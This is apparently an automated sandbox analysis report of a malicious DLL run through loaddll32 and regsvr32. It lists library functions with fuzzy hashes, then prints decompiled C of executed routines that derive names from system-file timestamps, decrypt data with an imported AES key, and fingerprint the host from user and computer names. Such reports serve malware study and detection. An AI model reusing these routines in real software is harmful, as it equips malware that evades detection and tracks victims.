Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction ID: a649fcededa5587265eb86119c4e5a96778eb533337fca3aa28abf5dba02169a
Opcode Fuzzy Hash: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction Fuzzy Hash: E211C636A45622ABDFE29A68CCD4F5AB7B4AF03770F254131EA55E7380D770ED0086D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E5566, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001), ref: 6D4E557D
GetLastError.KERNEL32(?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001,?,6D4E47F8,['Nm), ref: 6D4E5589

Part of subcall function 6D4E554F: CloseHandle.KERNEL32(6D5098D0,6D4E5599,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001), ref: 6D4E555F

___initconout.LIBCMT ref: 6D4E5599

Part of subcall function 6D4E5511: CreateFileW.KERNEL32(6D506778,40000000,00000003,00000000,00000003,00000000,00000000,6D4E5540,6D4E4FB3,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E5524

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E55AE

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction ID: 3bcd926009afb093f79b9f06d150f185f46bab88ac14716b933eb004d59d138d
Opcode Fuzzy Hash: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction Fuzzy Hash: 82F0F836401965BBCF626F958D08E993F76EF8A3B2F064014FA1985224C732CD20DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DAAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6D4DAC20

Strings

ror, xrefs: 6D4DAAE6
<(Pm, xrefs: 6D4DAC2B

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ___std_exception_copy
String ID: <(Pm$ror
API String ID: 2659868963-41268868
Opcode ID: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction ID: ae9e63782f77de96b7dbb02a5cb8ea27e6947205f72484eed556feca819f5874
Opcode Fuzzy Hash: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction Fuzzy Hash: 2651E371E002489FDB14CFA8C994FAEBBB5FF59314F10861DE415AB781E734A981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DF2D2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6D4DF315, 6D4DF31C, 6D4DF352

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction ID: dcfa42301ab0a8c8956bc2f256245151bf5792ca795e8657f5b9126778770e33
Opcode Fuzzy Hash: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction Fuzzy Hash: 00419371A05695AFDF62CF99CC91EAEBBF8EF85350B2240AAE510D7310D7708E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6D4DD33F
__IsNonwritableInCurrentImage.LIBCMT ref: 6D4DD3F3

Strings

csm, xrefs: 6D4DD3DD

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction ID: 38b25a93d7347d3eb3b07846872bbac7af8c1b27bf1d54b5ff3a03e315aa8e16
Opcode Fuzzy Hash: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction Fuzzy Hash: FB41A534A04319ABCF40DF68C890E9EBBB5BF85318F158069E9149B391D731ED11CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E14AA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E1253: GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E

_free.LIBCMT ref: 6D4E1522

Strings

+?Nm, xrefs: 6D4E14DC

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: _free
String ID: +?Nm
API String ID: 269201875-616114912
Opcode ID: eb5ace3d6e713da658b01b8157a7e696d82abb682dc3376ad7e1a74c06e29be6
Instruction ID: 4156e603aa3197cbddcaf9608e4ea8f09e4f836a93d8cef9d94d13628f9a5607
Opcode Fuzzy Hash: eb5ace3d6e713da658b01b8157a7e696d82abb682dc3376ad7e1a74c06e29be6
Instruction Fuzzy Hash: E031C17290820ABFCB01DFA8C880F9A77F5AF44356F154169E9269B290EB31DD40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1253, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E
GetACP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E1295

Strings

+?Nm, xrefs: 6D4E12A2

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID:
String ID: +?Nm
API String ID: 0-616114912
Opcode ID: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction ID: 7934ce9d13a9bf059e9a92883a9c71212572c48ea2739427429b2bae24d8c62b
Opcode Fuzzy Hash: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction Fuzzy Hash: 08F04F30944605ABDF12DBA8C84AF6C77B0BB823AAF250748E534DEAD2C7719D85C781

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 7160 Parent PID: 7132 regsvr32.exeCOMMON

Executed Functions

Function 007A4E9C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E007A4E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x7aa2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x7aa290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x7aa2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x7aa290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x7aa290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x7aa2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x7aa2d0; // 0x4aed5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x7ab825; // 0x73797325
				_t83 = E007A1000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					_t68 =  &_v36; // 0x7a2779
					HeapFree( *0x7aa290, _t146,  *_t68);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x7aa2d0; // 0x4aed5a8
				_t16 = _t93 + 0x7ab846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t65 =  &_v36; // 0x7a2779
						_t141 =  *_t65;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						_t51 =  &_v36; // 0x7a2779
						memcpy( *_t51 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x007a4ea5
0x007a4eab
0x007a4ead
0x007a4ec7
0x007a4ecb
0x007a4ece
0x007a5143
0x007a514a
0x007a514a
0x007a4ed4
0x007a4ee9
0x007a4eeb
0x007a4eef
0x007a4ef2
0x007a5133
0x007a513d
0x00000000
0x007a513d
0x007a4ef8
0x007a4f03
0x007a4f08
0x007a4f0d
0x007a4f10
0x007a4f17
0x007a4f1e
0x007a4f21
0x007a5123
0x007a5123
0x007a512d
0x00000000
0x007a512d
0x007a4f37
0x007a4f3b
0x007a4f3e
0x007a4f41
0x007a4f49
0x007a4f4c
0x007a4f55
0x007a4f5b
0x007a4f65
0x007a4f6c
0x007a4f6c
0x007a4f7e
0x007a4f89
0x007a4f97
0x007a4f9c
0x007a4fa1
0x007a4fa4
0x007a4fa9
0x007a4fb3
0x007a4fb6
0x007a4fb9
0x007a4fcf
0x007a4fd3
0x007a4fd6
0x007a5121
0x00000000
0x007a5121
0x007a4fed
0x007a503e
0x007a5001
0x007a5009
0x007a500e
0x007a501c
0x007a5025
0x007a502e
0x007a502e
0x007a503c
0x007a503c
0x007a5042
0x007a5046
0x007a5046
0x007a504c
0x00000000
0x00000000
0x007a504e
0x007a5054
0x007a50fb
0x007a50fb
0x007a50fe
0x007a510b
0x007a510b
0x007a510f
0x00000000
0x00000000
0x007a5104
0x007a5108
0x007a5108
0x007a510a
0x007a510a
0x007a5114
0x007a511b
0x007a511d
0x00000000
0x007a511d
0x007a505a
0x007a505c
0x007a505c
0x007a506f
0x007a5075
0x007a5080
0x007a5082
0x007a5086
0x007a5088
0x007a5088
0x007a508d
0x007a508f
0x007a508f
0x007a508d
0x007a5094
0x007a5098
0x007a5098
0x007a50a2
0x007a50a8
0x007a50ad
0x007a50b0
0x007a50b0
0x007a50b3
0x007a50bd
0x007a50c5
0x007a50ca
0x007a50d8
0x007a50d8
0x007a50ec
0x007a50f0
0x007a50f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,007AA380), ref: 007A4EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 007A4EE9
memset.NTDLL ref: 007A4F03

Part of subcall function 007A1000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,007A4F1C,73797325), ref: 007A1011
Part of subcall function 007A1000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007A102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 007A4F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 007A4F55
FindCloseChangeNotification.KERNELBASE(?), ref: 007A4F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 007A4F78
lstrcat.KERNEL32(?,642E2A5C), ref: 007A4FB9
FindFirstFileA.KERNELBASE(?,?), ref: 007A4FCF
CompareFileTime.KERNEL32(?,?), ref: 007A4FED
FindNextFileA.KERNELBASE(007A3EAC,?), ref: 007A5001
FindClose.KERNEL32(007A3EAC), ref: 007A500E
FindFirstFileA.KERNEL32(?,?), ref: 007A501A
CompareFileTime.KERNEL32(?,?), ref: 007A503C
StrChrA.SHLWAPI(?,0000002E), ref: 007A506F
memcpy.NTDLL(y'z,?,00000000), ref: 007A50A8
FindNextFileA.KERNELBASE(007A3EAC,?), ref: 007A50BD
FindClose.KERNEL32(007A3EAC), ref: 007A50CA
FindFirstFileA.KERNEL32(?,?), ref: 007A50D6
CompareFileTime.KERNEL32(?,?), ref: 007A50E6
FindClose.KERNELBASE(007A3EAC), ref: 007A511B
HeapFree.KERNEL32(00000000,y'z,73797325), ref: 007A512D
HeapFree.KERNEL32(00000000,?), ref: 007A513D

Strings

y'z, xrefs: 007A5123, 007A50A2, 007A50FB, 007A50A7

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID: y'z
API String ID: 2944988578-3463749770
Opcode ID: 7441ab85f5df9c694477d4911083bc821d456068131a77a1dcd7f983efcf5489
Instruction ID: 4cf88f87e8c7ac84ce424e0902c86ca294431cfdaa3c808408102a832ff2e348
Opcode Fuzzy Hash: 7441ab85f5df9c694477d4911083bc821d456068131a77a1dcd7f983efcf5489
Instruction Fuzzy Hash: 75813A71900109EFDF11DFA4DC84AEFBBB9FB86340F104166E505E6160D7799A54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 007A35A1, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E007A35A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x7aa0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x7aa0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E007A5C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x7aa0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E007A2A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x007a35aa
0x007a35b0
0x007a35b3
0x007a35b9
0x007a35b9
0x007a35bb
0x007a35bd
0x007a35c0
0x007a35c6
0x007a35c7
0x007a35c8
0x007a35ce
0x007a35d3
0x007a35d9
0x007a35e1
0x007a373e
0x007a35e7
0x007a35e9
0x007a35f2
0x007a35f7
0x007a3609
0x007a360c
0x007a3610
0x007a3617
0x007a361b
0x007a3623
0x007a3729
0x007a3629
0x007a3629
0x007a362d
0x007a362e
0x007a3630
0x007a363b
0x007a3715
0x007a3641
0x007a3641
0x007a3644
0x007a364a
0x007a3650
0x007a3650
0x007a3658
0x007a365c
0x007a365f
0x007a3706
0x007a3665
0x007a366b
0x007a366e
0x007a3671
0x007a3673
0x007a3676
0x007a3679
0x007a367b
0x007a367b
0x007a3685
0x007a368a
0x007a368d
0x007a3690
0x007a3692
0x007a369b
0x007a36c5
0x007a369d
0x007a36ae
0x007a36ae
0x007a36cd
0x00000000
0x00000000
0x007a36cf
0x007a36d2
0x007a36d5
0x007a36d9
0x00000000
0x007a36db
0x007a36ea
0x007a36f0
0x007a36f8
0x007a36f8
0x00000000
0x007a36d9
0x007a36dd
0x007a36e5
0x007a36e8
0x007a36ff
0x00000000
0x00000000
0x00000000
0x007a36e8
0x007a365f
0x007a3718
0x007a371b
0x007a371b
0x007a3730
0x007a3730
0x007a3748

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007A1B16,00000001,007A6301,00000000), ref: 007A35D9
memcpy.NTDLL(007A1B16,007A6301,00000010,?,?,?,007A1B16,00000001,007A6301,00000000,?,007A5B47,00000000,007A6301,?,00000000), ref: 007A35F2
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 007A361B
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 007A3633
memcpy.NTDLL(00000000,00000000,05299630,00000010), ref: 007A3685
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05299630,00000020,?,?,00000010), ref: 007A36AE
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05299630,?,?,00000010), ref: 007A36C5
GetLastError.KERNEL32(?,?,00000010), ref: 007A36DD
GetLastError.KERNEL32 ref: 007A370F
CryptDestroyKey.ADVAPI32(00000000), ref: 007A371B
GetLastError.KERNEL32 ref: 007A3723
CryptReleaseContext.ADVAPI32(?,00000000), ref: 007A3730
GetLastError.KERNEL32(?,?,?,007A1B16,00000001,007A6301,00000000,?,007A5B47,00000000,007A6301,?,00000000,007A6301,00000000,05299630), ref: 007A3738

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: b98b51f49ceee91d254ff17db1e5cba1426b27389931f3e6a755511ce492d7ba
Instruction ID: 8172772062eb2744f0bbe176d28ae95fcaa4ad94ec5958db25d10d62a8121899
Opcode Fuzzy Hash: b98b51f49ceee91d254ff17db1e5cba1426b27389931f3e6a755511ce492d7ba
Instruction Fuzzy Hash: 42515FB1900209FFDF10DFA9DD88AAEBBB9EB85340F108525F905E6250E7389E14DB61

Uniqueness

Uniqueness Score: -1.00%

Function 007A3946, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E007A3946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				intOrPtr _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x7aa2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E007A354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x7aa2cc ^ 0x4c0ca0ae;
				} else {
					_t5 =  &_v8; // 0x7a2f3f
					GetUserNameW(0, _t5);
					_t6 =  &_v8; // 0x7a2f3f
					_t50 =  *_t6;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x7aa290, 0, _t50 + _t50);
						if(_t62 != 0) {
							_t7 =  &_v8; // 0x7a2f3f
							if(GetUserNameW(_t62, _t7) != 0) {
								_t8 =  &_v8; // 0x7a2f3f
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E007A3F12( *_t8 +  *_t8, _t63);
							}
							HeapFree( *0x7aa290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x7aa290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E007A3F12(_v8 + _v8, _t63);
						}
						HeapFree( *0x7aa290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x007a3946
0x007a394e
0x007a3954
0x007a3957
0x007a395a
0x007a395c
0x007a3961
0x007a3961
0x007a3967
0x007a3969
0x007a3976
0x007a39d7
0x007a3978
0x007a3978
0x007a397d
0x007a3983
0x007a3983
0x007a3988
0x007a3996
0x007a399a
0x007a399c
0x007a39a9
0x007a39ab
0x007a39b0
0x007a39b7
0x007a39b7
0x007a39c2
0x007a39c2
0x007a399a
0x007a3988
0x007a39d9
0x007a39df
0x007a39e9
0x007a39eb
0x007a39f0
0x007a39ff
0x007a3a03
0x007a3a0e
0x007a3a15
0x007a3a1c
0x007a3a1c
0x007a3a28
0x007a3a28
0x007a3a03
0x007a3a31
0x007a3a33
0x007a3a36
0x007a3a38
0x007a3a3b
0x007a3a3e
0x007a3a48
0x007a3a4c
0x007a3a50

APIs

GetUserNameW.ADVAPI32(00000000,?/z), ref: 007A397D
RtlAllocateHeap.NTDLL(00000000,?/z), ref: 007A3994
GetUserNameW.ADVAPI32(00000000,?/z), ref: 007A39A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,007A2F3F,?,?,?,?,?,007A44F9,?,00000001), ref: 007A39C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 007A39E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 007A39FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 007A3A0A
HeapFree.KERNEL32(00000000,00000000), ref: 007A3A28

Strings

?/z, xrefs: 007A3978, 007A3983, 007A399C, 007A39AB, 007A397B, 007A398C, 007A399F
?/z, xrefs: 007A3A05, 007A39E3, 007A3A10, 007A39EB

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: ?/z$?/z
API String ID: 3239747167-611614659
Opcode ID: 558b1bdb435f52bf7f31eac62507c76b81dd35aa6142a850d44fb54b7fcbc520
